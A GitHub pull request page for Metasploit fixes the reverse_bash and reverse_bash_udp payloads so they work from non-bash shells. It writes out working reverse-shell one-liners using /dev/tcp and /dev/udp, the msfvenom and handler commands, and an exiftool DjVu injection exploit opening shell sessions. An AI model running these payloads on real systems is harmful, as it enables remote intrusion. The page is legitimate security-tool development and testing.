Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bash payload works outside of bash context #15875

Merged
merged 2 commits into from
Nov 15, 2021
Merged

Bash payload works outside of bash context #15875

merged 2 commits into from
Nov 15, 2021

Conversation

smashery
Copy link
Contributor

@smashery smashery commented Nov 15, 2021
edited by smcintyre-r7
Loading

This resolves #15191. The chosen solution is to prepend bash -c to the payload, and quote it.

Verification

List the steps needed to make sure this thing works

  • Create a payload using msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234
  • Start msfconsole
  • In MSF: handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash
  • Launch a different shell (e.g. sh)
  • Run the command output by msfvenom
  • Repeat these steps for the cmd/unix/reverse_bash_udp payload type
  • Test the payload in a real setting (e.g. exploit/unix/fileformat/exiftool_djvu_ant_perl_injection)

Demonstration

To test this directly:

TCP

user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 77: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash
[*] Payload handler running as background job 3.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse TCP handler on 0.0.0.0:1234 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 5 opened (127.0.0.1:1234 -> 127.0.0.1:51092 ) at 2021-11-15 16:14:39 +1100
sessions 5
[*] Starting interaction with 5...

whoami
user

UDP

user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash_udp lhost=127.0.0.1 lport=1235
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 31: Bad file descriptor

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1235 -H 0.0.0.0 -p cmd/unix/reverse_bash_udp
[*] Payload handler running as background job 4.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse UDP handler on 0.0.0.0:1235 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 6 opened (0.0.0.0:1235 -> 127.0.0.1:50624 ) at 2021-11-15 16:17:30 +1100
sessions 6
[*] Starting interaction with 6...

whoami
user

To test this in a real situation, I created a new user with the default shell of /bin/sh, and tested the issue for which this bug was initially reported.

I created broke.jpg prior to this fix, with a cmd/unix/reverse_bash payload, and workingtcp.jpg and workingudp.jpg after it.

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > jobs

Jobs
====

  Id  Name                    Payload                    Payload opts
  --  ----                    -------                    ------------
  0   Exploit: multi/handler  cmd/unix/reverse_bash      tcp://0.0.0.0:2324
  2   Exploit: multi/handler  cmd/unix/reverse_bash_udp  udp://0.0.0.0:2345

Before the fix

$ ./exiftool /tmp/broke.jpg     
sh: 1: Syntax error: Bad fd number
ExifTool Version Number         : 12.16
File Name                       : broke.jpg
Directory                       : /tmp
File Size                       : 2.5 KiB
File Modification Date/Time     : 2021:11:15 13:58:37+11:00
File Access Date/Time           : 2021:11:15 13:58:49+11:00
File Inode Change Date/Time     : 2021:11:15 13:58:37+11:00
File Permissions                : rw-rw-r--
File Type                       : JPEG (multi-page)
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Subfile Type                    : Single-page image
DjVu Version                    : 0.24
Spatial Resolution              : 100
Gamma                           : 2.2
Orientation                     : Unknown (0)
Included File ID                : shared_anno.iff
Author                          : .
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Image Width                     : 8
Image Height                    : 8
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 8x8
Megapixels                      : 0.000064
$ <process ended; new prompt>

After the fix, Reverse Bash TCP

$ ./exiftool /tmp/workingtcp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 192: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 3 opened (192.168.1.206:2324 -> 192.168.1.206:51842 ) at 2021-11-15 16:07:06 +1100
sessions 3
[*] Starting interaction with 3...

whoami
test

After the fix, Reverse Bash UDP

$ ./exiftool /tmp/workingudp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 206: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 4 opened (0.0.0.0:2345 -> 192.168.1.206:40553 ) at 2021-11-15 16:10:23 +1100
sessions 4
[*] Starting interaction with 4...

pwd
/tmp/Image-ExifTool-12.16

@wvu wvu mentioned this pull request Nov 15, 2021
Merged
@smcintyre-r7 smcintyre-r7 self-assigned this Nov 15, 2021
@smcintyre-r7
Copy link
Contributor

Everything looks good to me and appears to be working as intended. I'll get this landed in a moment. Thanks!

@smcintyre-r7 smcintyre-r7 merged commit b428863 into rapid7:master Nov 15, 2021
@smcintyre-r7
Copy link
Contributor

Release Notes

This fixes an issue with the reverse Bash command shell payloads where they would not work outside of the context of bash.

@smcintyre-r7 smcintyre-r7 added the rn-fix release notes fix label Nov 15, 2021
@wvu wvu mentioned this pull request Mar 8, 2022
Merged
4 tasks
@smashery smashery deleted the bash_payload_bugfix branch November 24, 2023 06:00
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug payload rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

reverse_bash and reverse_bash_udp payloads don't work from non-bash contexts
2 participants
@smashery @smcintyre-r7